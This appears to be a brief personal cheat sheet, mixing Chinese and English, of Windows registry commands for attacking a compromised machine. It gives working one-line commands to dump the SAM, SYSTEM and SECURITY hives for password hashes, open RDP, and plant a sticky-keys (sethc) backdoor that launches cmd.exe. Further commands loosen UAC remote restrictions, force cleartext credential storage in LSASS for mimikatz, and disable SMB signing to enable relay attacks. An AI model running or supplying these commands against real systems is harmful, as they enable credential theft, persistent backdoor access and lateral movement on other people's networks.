Windows 常用命令

仅作为备份.

dump hive hash

dump system hash into .hive file.

1
2
3
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive

open port 3389

one command.

1
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

sethc hijacking

shift backdoor.

1
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

disabled uac policy

allow remote access for other administrator users.

1
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

store clearpassword in lsass

mimikatz for server 2012.

1
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

disable smb signature

smb relay attack.

1
reg add HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v RequireSecuritySignature /t REG_DWORD /d 0 /f
0%